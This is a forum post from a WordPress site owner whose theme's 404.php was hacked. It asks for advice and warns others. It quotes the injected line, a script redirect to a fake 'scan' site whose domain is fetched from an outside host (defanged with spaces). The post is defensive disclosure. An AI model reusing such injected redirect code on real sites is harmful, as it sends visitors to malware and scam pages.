404.php theme hacked – any advices?

  • talgalili

    (@talgalili)


    15 years ago

    Hello people.

    I am writing this in order to
    1) warn other people.
    2) help people who might got this hack
    3) get more tips from more knowledgeable people then me ??

    I entered into one of my sites today and my AVAST antivirus warned me against a Trojan Horse (JS:ScriptIP-inf [Trj])
    That was located inside my theme image files, two of them:
    1) images/ico-catlist.gif\{gzip}
    2) images/ico-arrow.gif\{gzip}

    I searched for them in the source code of the site but couldn’t find them.
    I then went to the server and didn’t see any changes in those files.
    I then looked for any changes made to any of the files on the site.

    I found that the 404.php file was changed today.
    After opening it I found it had the following code added to the beginning of it (just before the “<?php get_header(); ?>” ) :

    <script>location=’https://scan.&lt;?php echo file_get_contents(‘https:// borntobebest . biz/actual_domain.txt’); ?>/vista1/6/48017/’;</script>

    (I added spaces in the URL, just to be on the safe side)

    I erased the extra line and the site stopped to give Trojan warnings.

    Here are my questions:
    1) my theme diractory was CHMOD 775, I changed it to 555 – will this help in the future ?
    2) Why did my homepage suffer from a code injection in the 404.php ? isn’t the 404.php file activated only when the page is not found ?

    Any thoughts will be warmly welcomed.

    Tal

Viewing 5 replies - 1 through 5 (of 5 total)
Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘404.php theme hacked – any advices?’ is closed to new replies.